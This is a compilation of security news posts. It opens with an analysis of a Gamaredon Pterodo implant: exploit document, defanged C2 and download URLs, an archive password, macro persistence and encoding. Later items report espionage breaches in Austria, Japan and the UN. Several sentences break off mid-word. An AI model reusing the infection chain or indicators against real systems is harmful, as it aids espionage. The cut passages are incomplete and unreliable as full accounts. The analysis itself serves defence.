Security experts from Yoroy-Cybaze ZLab have conducted a detailed analysis of an implant used by the Gamaredon APT group in a recent campaign.
Gamaredon Group is a Cyber Espionage persistent operation attributed to Russians FSB (Federal Security Service) in a long-term military and geo-political confrontation against the Ukrainian government and more in general against the Ukrainian military power.
In recent months, Ukrainian CERT (CERT-UA) reported an intensification of Gamaredon Cyberattacks against military targets. The new wave dates back to the end of November 2019 and was first analyzed by Vitali Kremez. Starting from those findings, Cybaze-Yoroi ZLab team decided to deep dive into a technical analysis of the latest Pterodo implant.
The complex infection chain begins with a weaponized Office document named “f.doc”. In the following table the initial malware information is provided.
|Threat||Gamaredon Pteranodon weaponized document|
|Brief Description||Doc file weaponized with Exploit|
Table 1. Information about initial dropper
The decoy document is written using the ukrainian language mixed to many special chars aimed to lure the target to click on it, and, once opened, it appears as in the following figure.
The document leverages the common exploit aka CVE-2017-0199 and tries to download a second stage from “hxxp://win-apu.]ddns.]net/apu.]dot”.
Thanks to this exploit (Remote Code Execution exploit) the user interaction is not required, in fact the “enable macro” button is not shown. The downloaded document has a “.dot” extension, used by Microsoft Office to save templates for different documents with similar formats. Basic Information on the “.dot” file are provided:
|Threat||Gamaredon Pteranodon loader dot file|
|Brief Description||Dot file enabling the infection of the Gamaredon Pteranodon|
Table 2. Information about second stage
If we decide to open the document, we see that the document is empty, but it requires the enabling of the macro.
The body of the macro can be logically divided into two distinct parts:
- The first one is the setting of the registry key “HKEY_CURRENT_USER\Software\Microsoft\Office\” & Application.Version & _”\Word\Security\” and the declaration of some other variables, such as the dropurl “get-icons.]ddns.net”;
- The second one is the setting of the persistence mechanism through the writing of the vbs code in the Startup folder with name “templates.vbs”. This vbs is properly the macro executed by the macro engine of word
The evidence of the written file in the Startup folder:
Analyzing the content of “templates.vbs” it is possible to notice that it define a variable containing a URL like “hxxp://get-icons.]ddns.]net/ADMIN-PC_E42CAF54//autoindex.]php” obtained from “hxp://get-icons.]ddns.]net/” & NlnQCJG & “_” & uRDEJCn & “//autoindex.]php”, where “NlnQCJG” is the name that identifies the computer on the network and “uRDEJCn” is the serial number of drive in hexadecimal encoding. From this URL it tries to download another stage then storing it into “C:\Users\admin\AppData\Roaming\” path with random name. At the end, “templates.vbs” script will force the machine to reboot.
The dropped sample is an SFX archive, like the tradition of Gamaredon implants.
|Threat||Gamaredon Pteranodon implant SFX archive|
|Brief Description||SFX Archive First Stage|
Table 3. Information about first SFX archive
By simply opening the SFX archive, it is possible to notice two different files that are shown below and named respectively “8957.cmd” and “28847”.
When executed, the SFX archive will be extracted and the “8957.cmd” will be run. The batch script looks like the following screen:
It contains several junk instructions with the attemption to make the analysis harder. Cleaning the script we obtain:
At this point, the batch script renames the “28847” file in “28847.exe”, opens it using “pfljk,fkbcerbgblfhs” as password and the file contained inside the “28847.exe” file will be renamed in “WuaucltIC.exe”. Finally, it will be run using “-post.php” as argument.
The fact that the “28847.exe” file can be opened makes us understand that the “28847” file is another SFX file. Some static information about SFX are:
|Threat||Gamaredon Pteranodon implant SFX archive|
|Brief Description||SFX Archive Second Stage|
Table 4. Information about the second SFX archive
Exploring it, it is possible to see several files inside of it, as well as the 6323 file. The following figure shows a complete list.
In this case, the SFX archive contains 8 files: five of them are legit DLLs used by the “6323” executable to interoperate with the OLE format defined and used by Microsoft Office. The “ExcelMyMacros.txt” and “wordMacros.txt” files contain further macro script, described next. So, static analysis on the “6323” file shown as its nature: it is written using Microsoft Visual Studio .NET, therefore easily to reverse. Before reversing the executable, it is possible to clean it allowing the size reduction and the junk instruction reduction inside the code. The below image shows the information about the sample before and after the cleaning.
The source code looks as follows.
The first check performed is on the arguments: if the arguments length is equal to zero, the malware terminates the execution. After that, the malware checks if the existence of the files “ExcelMyMacros.txt” and “wordMacros.txt” in the same path where it is executed: if true then it reads their contents otherwise it will exit.
Part of the content of the variable “xVGlMEP”:
There is a thin difference between the two files.
As visible in the previous figure, the only difference between the files are in the variable, registry key and path used by Word rather than by Excel. Finally the macros are executed using the Office engine like in the following figure.
So let’s start to dissect the macros. For a better comprehension we will be considering only one macro and in the specific case we will analyze “wordMacros.txt” ones. First of all the macro will set the registry key “HKEY_CURRENT_USER\Software\Microsoft\Office\” & Application.Version & _”\Word\Security\” and then will set up two scheduled tasks that will start respectively every 12 and 15 minutes: the first one will run a “IndexOffice.vbs” in the path “%APPDATA%\Microsoft\Office\” and the second one will run “IndexOffice.exe” in the same path.
Finally, the malware will write the “IndexOffice.txt” file in the “%APPDATA%\Microsoft\Office\” path. The following figure shows what has been previously described:
The script will check the presence of the “IndexOffice.exe” artifact: if true then it will delete it and it will download a new file/script from “hxxp://masseffect.]space/<PC_Name>_<Hex_Drive_SN>/post.]php”.
The malware tries to save the C2 response and encoding it using Encode function. This function accepts three parameters: the input file, the output file and the arrKey; arrKey is calculated thanks to GetKey function that accepts as input the Hexadecimal value of the Driver SN installed on the machine and returns the key as results. Part of Encode function and complete code of GetKey function are shown below.
Visiting the web page relative to C2, it shows a “Forbidden message” so this means that the domain is still active but refuses incoming requests.
Gamaredon cyberwarfare operations against Ukraine are still active. This technical analysis reveals that the modus operandi of the Group has remained almost identical over the years.
The massive use of weaponized Office documents, Office template injection, sfx archives, wmi and some VBA macro stages that dynamically changes, make the Pterodon attack chain very malleable and adaptive. However, the introduction of a .Net component is a novelty compared to previous Pterodon samples.
Further technical details, including Indicators of Compromise and Yare rules, are reported in the analysis published by the experts at the Cybaz-Yoroi ZLAB
The post Cyberwarfare: A deep dive into the latest Gamaredon Espionage Campaign appeared first on Security Affairs.
Austria’s foreign ministry announced that the cyber attack against its systems, allegedly carried by a state actor has ended.
Earlier January, Austria’s foreign ministry announced it was facing a “serious
“Due to the gravity and nature of the attack, it cannot be ruled out that this is a targeted attack by a state actor,” the foreign ministry said at the time in a joint statement with the interior ministry.
“Despite all the intensive security measures, there is no 100-percent protection against cyberattacks.”
The attack took place on the evening of Saturday 4 January evening and it was quickly detected. Local reports revealed that the attack aimed at the ministry’s IT infrastructure.
Authorities immediately adopted the defensive measures to protect their infrastructure, it also set up a special committee to respond to the incident. It is not clear if the hackers gained access to sensitive data.
This week, the Austrian foreign ministry announced that the cyber attack against its systems has ended.
“After really intensive work and excellent cooperation between all the departments involved, last weekend we managed to clean up our IT systems and end the cyber attack on the Foreign Ministry,” said Foreign Minister Alexander Schallenberg. “The highest possible data security at the Foreign Ministry is guaranteed and no damage to the IT equipment could be detected.”
“According to current knowledge, this was a targeted attack against the Foreign Ministry with the intention of gathering information. However, due to the dimension and the high complexity, it cannot yet be said beyond doubt who is behind the attack.”
The authorities are still investigating the attack, the government experts have no doubt about the fact that it was a targeted cyber-espionage attack against the Foreign Ministry.
“Espionage is a serious
Intelligence experts speculated the involvement of Russian or Chinese cyber
“The entire course of this
The Turla APT group (aka Snake, Uroburos, Waterbug, Venomous Bear and KRYPTON) has been active since at least 2007 targeting diplomatic and government organizations and private businesses in the Middle East, Asia, Europe, North and South America and former Soviet bloc nations.
The list of previously known victims is long and includes also the Swiss defense firm RUAG, US Department of State, and the US Central Command.
Major cyber attacks are a rarity in Austria, only a few large-scale attacks were observed in the past years. In September 2019, before the National Council election, the ÖVP was hit by a “very targeted hacker attack” on the party headquarters.
In 2018, the websites of the parliament and various ministries in Austria were targeted by DDoS attacks (Distributed Denial of Service).
Other European countries suffered similar attacks in the past, in 2015 more than 20,000 computers belonging to the German Bundestag were infected with malware. Experts and media reported a possible involvement of Russian state-sponsored hackers.
The post The cyber attack against Austria’s foreign ministry has ended appeared first on Security Affairs.
Japanese defense contractors Pasco and Kobe Steel have disclosed security breaches that they have suffered back in 2016 and 2018.
Pasco is Japan’s largest geospatial provider and Kobe Steel is one of the major steel manufacturers. Just last week, Japan’s Ministry of Defense announced in addition to Mitsubishi Electric and the NEC defense business division other two unnamed contractors suffered a data breach.
The Japanese Defense Minister Taro Kono said during a p
After the announcement, both Pasco and Kobe Steel disclose the incidents, while Pasco declared that it had not found any evidence that personal or business information had been stolen by attackers, Kobe confirmed that some files may have been
Kobe identified unauthorized access to its network in August 2016 and in June 2017, Pasco had detected the intrusion in May 2018.
However, contrary to what Kobel declared in the official statement, the N
The Japanese Defense Minister Taro Kono added that there is no evidence that the attacks are related to each other.
The breach was detected almost eight months ago, on June 28, 2019, with the delay being attributed to the increased complexity of the investigation caused by the attackers deleting activity logs.
The hacker group has been targeting Japanese heavy industry, manufacturing and international relations at least since 2012,
According to the experts, the group is linked to the People’s Republic of China and is focused on exfiltrating confidential data. The attackers have exploited a directory traversal and arbitrary file upload vulnerability, tracked as CVE-2019-18187, in the Trend Micro OfficeScan antivirus.
“According to people involved, Chinese hackers Tick may have been involved. According to Mitsubishi Electric, “logs (to check for leaks) have been deleted and it is not possible to confirm whether or not they actually leaked.” reported the Nikkei.
“According to the company, at least tens of PCs and servers in Japan and overseas have been found to have been compromised. The amount of unauthorized access is approximately 200 megabytes, mainly for documents.”
A few days later, the IT giant NEC confirmed that the company defense business division has suffered a security breach back in December 2016.
The Japanese firm confirmed the unauthorized access to its internal network after Japanese newspapers disclosed the security incident citing sources informed of the event.
NEC is a contractor for Japan’s defense industry and was involved in various defense projects.
Roughly 28,000 files were found by the company on one of the compromised servers, some of them containing info about defense equipment.
Experts believe that the attacks on Japanese Defense’s contractors were part of a cyber espionage campaign carried out by Chinese hackers.
(SecurityAffairs – Pasco and Kobe Steel, hacking)
The post Japanese defense contractors Pasco and Kobe Steel disclose security breaches appeared first on Security Affairs.
A leaked confidential report from the United Nations revealed that dozens of servers belonging to
United Nations were “compromised” at offices in Geneva and Vienna.
An internal confidential report from the United N
One of the offices that were hit by a sophisticated cyber attack is the U.N.
“One U.N. official told the AP that the hack, which was first detected over the summer, appeared “sophisticated” and that the extent of the damage remains unclear, especially in terms of p
The level of sophistication of the attack and the specific nature of the target suggests the involvement of a nation-state actor.
“We were hacked,” declared U.N.
The report states that at least 42 servers were “compromised,” three of them belonged to the Office of the High Commissioner for Human Rights. Experts suspect that another 25 servers located at the United Nations offices in Geneva and Vienna were also compromised.
“Technicians at the United Nations office in Geneva, the world body’s European hub, on at least two occasions worked through weekends in recent months to isolate the local U.N. data center from the Internet, re-write p
The post Leaked confidential report states United Nations has been hacked appeared first on Security Affairs.
The healthcare industry faces a range of threat groups and malicious activity. Given the critical role that healthcare plays within society and its relationship with our most sensitive information, the risk to this sector is especially consequential. It may also be one of the major reasons why we find healthcare to be one of the most retargeted industries.
In our new report, Beyond Compliance: Cyber Threats and Healthcare, we share an update on the types of threats observed affecting healthcare organizations: from criminal targeting of patient data to less frequent – but still high impact – cyber espionage intrusions, as well as disruptive and destructive threats. We urge you to review the full report for these insights, however, these are two key areas to keep in mind.
- Chinese espionage targeting of medical researchers: We’ve seen medical research – specifically cancer research – continue to be a focus of multiple Chinese espionage groups. While difficult to fully assess the extent, years of cyber-enabled theft of research trial data might be starting to have an impact, as Chinese companies are reportedly now manufacturing cancer drugs at a lower cost to Western firms.
- Healthcare databases for sale under $2,000: The sheer number of healthcare-associated databases for sale in the underground is outrageous. Even more concerning, many of these databases can be purchased for under $2,000 dollars (based on sales we observed over a six-month period).
To learn more about the types of financially motivated cyber threat activity impacting healthcare organizations, nation state threats the healthcare sector should be aware of, and how the threat landscape is expected to evolve in the future, check out the full report here, or give a listen to this podcast conversation between Principal Analyst Luke McNamara and Grady Summers, EVP, Products:
For a closer look at the latest breach and threat landscape trends facing the healthcare sector, register for our Sept. 17, 2019, webinar.
For more details around an actor who has targeted healthcare, read about our newly revealed APT group, APT41.